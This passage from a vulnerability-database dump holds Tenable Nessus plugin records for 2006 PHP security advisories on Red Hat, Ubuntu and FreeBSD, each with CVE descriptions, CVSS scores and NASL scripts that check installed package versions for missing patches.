([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0682\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.11\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.11\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.11\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.11\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.11\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.11\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.11\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.11\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-02T15:39:07", "references": ["https://usn.ubuntu.com/342-1/"], "pluginID": "27921", "description": "The sscanf() function did not properly check array boundaries. In applications which use sscanf() with argument swapping, a remote attacker could potentially exploit this to crash the affected web application or even execute arbitrary code with the application's privileges. (CVE-2006-4020)\n\nThe file_exists() and imap_reopen() functions did not perform proper open_basedir and safe_mode checks which could allow local scripts to bypass intended restrictions. (CVE-2006-4481)\n\nOn 64 bit systems the str_repeat() and wordwrap() functions did not properly check buffer boundaries. Depending on the application, this could potentially be exploited to execute arbitrary code with the applications' privileges. This only affects the amd64 and sparc platforms. (CVE-2006-4482)\n\nA buffer overflow was discovered in the LWZReadByte_() function of the GIF image file parser. By tricking a PHP application into processing a specially crafted GIF image, a remote attacker could exploit this to execute arbitrary code with the application's privileges.\n(CVE-2006-4484).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : php4, php5 vulnerabilities (USN-342-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4484", "CVE-2006-4020", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2018-12-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:php4-common", "p-cpe:/a:canonical:ubuntu_linux:php5-mhash", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php4", "p-cpe:/a:canonical:ubuntu_linux:php5-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php4-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-odbc", "p-cpe:/a:canonical:ubuntu_linux:php5-sqlite", "p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc", "cpe:/o:canonical:ubuntu_linux:5.04", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", "p-cpe:/a:canonical:ubuntu_linux:php5-xsl", "p-cpe:/a:canonical:ubuntu_linux:php5-sybase", "p-cpe:/a:canonical:ubuntu_linux:php5-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "p-cpe:/a:canonical:ubuntu_linux:php4-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-pgsql", "p-cpe:/a:canonical:ubuntu_linux:php5-mysqli", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:php4-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-recode", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php4", "p-cpe:/a:canonical:ubuntu_linux:php5", "p-cpe:/a:canonical:ubuntu_linux:php5-snmp", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "p-cpe:/a:canonical:ubuntu_linux:php-pear"], "id": "UBUNTU_USN-342-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27921", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-342-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27921);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/12/01 15:12:38\");\n\n script_cve_id(\"CVE-2006-4020\", \"CVE-2006-4481\", \"CVE-2006-4482\", \"CVE-2006-4484\");\n script_bugtraq_id(19415, 19582);\n script_xref(name:\"USN\", value:\"342-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : php4, php5 vulnerabilities (USN-342-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The sscanf() function did not properly check array boundaries. In\napplications which use sscanf() with argument swapping, a remote\nattacker could potentially exploit this to crash the affected web\napplication or even execute arbitrary code with the application's\nprivileges. (CVE-2006-4020)\n\nThe file_exists() and imap_reopen() functions did not perform proper\nopen_basedir and safe_mode checks which could allow local scripts to\nbypass intended restrictions. (CVE-2006-4481)\n\nOn 64 bit systems the str_repeat() and wordwrap() functions did not\nproperly check buffer boundaries. Depending on the application, this\ncould potentially be exploited to execute arbitrary code with the\napplications' privileges. This only affects the amd64 and sparc\nplatforms. (CVE-2006-4482)\n\nA buffer overflow was discovered in the LWZReadByte_() function of the\nGIF image file parser. By tricking a PHP application into processing a\nspecially crafted GIF image, a remote attacker could exploit this to\nexecute arbitrary code with the application's privileges.\n(CVE-2006-4484).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/342-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapache2-mod-php4\", pkgver:\"4:4.3.10-10ubuntu4.7\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4\", pkgver:\"4.3.10-10ubuntu4.7\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-cgi\", pkgver:\"4:4.3.10-10ubuntu4.7\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-cli\", pkgver:\"4:4.3.10-10ubuntu4.7\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-common\", pkgver:\"4.3.10-10ubuntu4.7\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-dev\", pkgver:\"4.3.10-10ubuntu4.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cgi\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cli\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-curl\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.2-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php-pear\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cgi\", pkgver:\"5.1.2-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cli\", pkgver:\"5.1.2-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-common\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-curl\", pkgver:\"5.1.2-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-dev\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-gd\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-ldap\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mhash\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysql\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysqli\", pkgver:\"5.1.2-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-odbc\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-pgsql\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-recode\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-snmp\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sqlite\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sybase\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xmlrpc\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xsl\", pkgver:\"5.0.5-2ubuntu1.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php4 / libapache2-mod-php5 / php-pear / php4 / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:53:24", "references": ["http://www.php.net/release_5_1_5.php", "http://www.php.net/release_4_4_4.php", "http://www.nessus.org/u?68c53747"], "pluginID": "22343", "description": "The PHP development team reports :\n\n- Added missing safe_mode/open_basedir checks inside the error_log(), file_exists(), imap_open() and imap_reopen() functions.\n\n- Fixed overflows inside str_repeat() and wordwrap() functions on 64bit systems.\n\n- Fixed possible open_basedir/safe_mode bypass in cURL extension and with realpath cache.\n\n- Fixed overflow in GD extension on invalid GIF images.\n\n- Fixed a buffer overflow inside sscanf() function.\n\n- Fixed an out of bounds read inside stripos() function.\n\n- Fixed memory_limit restriction on 64 bit system.", "edition": 5, "reporter": "Tenable", "published": "2006-09-14T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (ea09c5df-4362-11db-81e1-000e0c2e438a)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4486", "CVE-2006-4483", "CVE-2006-4484", "CVE-2006-4485", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php4-cgi", "p-cpe:/a:freebsd:freebsd:php4-dtc", "p-cpe:/a:freebsd:freebsd:php4", "p-cpe:/a:freebsd:freebsd:php4-cli", "p-cpe:/a:freebsd:freebsd:mod_php5", "p-cpe:/a:freebsd:freebsd:mod_php4", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php4-nms", "p-cpe:/a:freebsd:freebsd:php5-cli", "p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php4-horde", "p-cpe:/a:freebsd:freebsd:php5-dtc", "p-cpe:/a:freebsd:freebsd:php5-horde", "p-cpe:/a:freebsd:freebsd:php5-nms", "p-cpe:/a:freebsd:freebsd:php5-cgi"], "id": "FREEBSD_PKG_EA09C5DF436211DB81E1000E0C2E438A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22343", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22343);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:41\");\n\n script_cve_id(\"CVE-2006-4481\", \"CVE-2006-4482\", \"CVE-2006-4483\", \"CVE-2006-4484\", \"CVE-2006-4485\", \"CVE-2006-4486\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (ea09c5df-4362-11db-81e1-000e0c2e438a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP development team reports :\n\n- Added missing safe_mode/open_basedir checks inside the error_log(),\nfile_exists(), imap_open() and imap_reopen() functions.\n\n- Fixed overflows inside str_repeat() and wordwrap() functions on\n64bit systems.\n\n- Fixed possible open_basedir/safe_mode bypass in cURL extension and\nwith realpath cache.\n\n- Fixed overflow in GD extension on invalid GIF images.\n\n- Fixed a buffer overflow inside sscanf() function.\n\n- Fixed an out of bounds read inside stripos() function.\n\n- Fixed memory_limit restriction on 64 bit system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/release_4_4_4.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/release_5_1_5.php\"\n );\n # https://vuxml.freebsd.org/freebsd/ea09c5df-4362-11db-81e1-000e0c2e438a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?68c53747\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mod_php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-dtc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-horde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-nms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-dtc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-horde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-nms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php4<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cli<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cli>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cli<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cli>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cgi<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cgi>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cgi<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cgi>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-dtc<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-dtc>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-dtc<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-dtc>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-horde<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-horde>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-horde<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-horde>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-nms<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-nms>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-nms<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-nms>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php4<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php4>=5<5.1.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php5<4.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php5>=5<5.1.5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:07:05", "references": ["https://bugs.php.net/bug.php?id=38322", "http://www.php.net/releases/5_1_5.php"], "pluginID": "17713", "description": "According to its banner, the version of PHP 5.x installed on the remote host is older than 5.1.5. Such versions may be affected by the following vulnerabilities :\n\n - The c-client library 2000, 2001, or 2004 for PHP does not check the safe_mode 